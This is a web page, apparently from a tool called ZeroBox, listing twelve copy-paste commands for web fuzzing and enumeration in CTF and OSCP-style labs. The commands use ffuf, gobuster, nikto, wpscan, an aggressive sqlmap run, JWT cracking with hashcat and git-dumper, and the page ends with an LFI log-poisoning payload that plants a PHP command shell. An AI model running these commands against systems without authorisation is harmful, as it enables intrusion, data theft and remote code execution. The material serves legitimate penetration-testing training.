ZeroBox

Web & Directory Fuzzing cheatsheet

12 copy-paste commands for web & directory fuzzing in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

ffuf Directory & Endpoint Fuzzing

High-speed directory enumeration with auto-calibrated filtering and extension recursion.

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://{TARGET_IP}/FUZZ -e .php,.html,.txt,.bak,.js -ac -mc 200,301,302,403

ffufwebfuzzdir

ffuf VHost / Virtual Subdomain Fuzzing

Fuzz HTTP Host header for virtual hosts; use -fs to filter default baseline size.

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://{TARGET_IP} -H "Host: FUZZ.target.htb" -mc 200,301,302 -fs 1234

ffufvhostsubdomaindns

ffuf Parameter Discovery (GET/POST)

Fuzz hidden query parameters on target page.

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "http://{TARGET_IP}/index.php?FUZZ=test" -ac

ffufparamsquery

Gobuster Fast Directory Busting

Standard Go-based multithreaded directory search.

gobuster dir -u http://{TARGET_IP}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,json -t 40 -b 404

gobusterwebdir

Feroxbuster Recursive Crawl & Fuzz

Deep Rust recursive crawler with smart 404 detection and auto-extract.

feroxbuster -u http://{TARGET_IP}/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,asp,aspx,jsp -d 2

feroxbusterrecursivecrawler

Nikto Web Server Misconfiguration Audit

Exhaustive web server check for outdated components, index files, and CGI leaks.

nikto -h http://{TARGET_IP} -Tuning 123bde -o nikto_{TARGET_IP}.html -Format htm

niktowebmisconfig

WPScan WordPress Enumeration & Attack

Enumerate vulnerable plugins, themes, and usernames on WordPress sites.

wpscan --url http://{TARGET_IP}/ --enumerate ap,at,u,cb --plugins-detection aggressive

wpscanwordpresscms

SQLmap Heavy Injection Probe (Risk 3 / Level 5)

High-potency SQL injection test checking all HTTP headers, cookies, and injection boundaries.

sqlmap -u "http://{TARGET_IP}/page?id=1" --batch --risk=3 --level=5 --threads=4 --dbs

sqlmapsqliwebadvanced

JWT Secret Key HMAC-SHA256 Cracking

Crack HS256 signed JSON Web Token secrets offline using rockyou wordlist.

hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

jwthashcatcryptoweb

GraphQL Schema Introspection Query

Query GraphQL endpoint for full type schema, queries, mutations, and hidden fields.

curl -s -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name,fields{name}}}}"}' http://{TARGET_IP}/graphql | jq .

graphqlapiintrospectionweb

Exposed .git Source Code Extraction

Dump full repository commits and source code from misconfigured public /.git/ directory.

git-dumper http://{TARGET_IP}/.git/ ./git-dump

gitsource-leakgit-dumperweb

LFI Log Poisoning via User-Agent

Inject PHP execution payload into web server access log, then include via LFI.

curl -s -A "<?php system(\$_GET['cmd']); ?>" http://{TARGET_IP}/ && curl "http://{TARGET_IP}/index.php?page=/var/log/apache2/access.log&cmd=id"

lfircelog-poisoningapache

Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet

More cheatsheets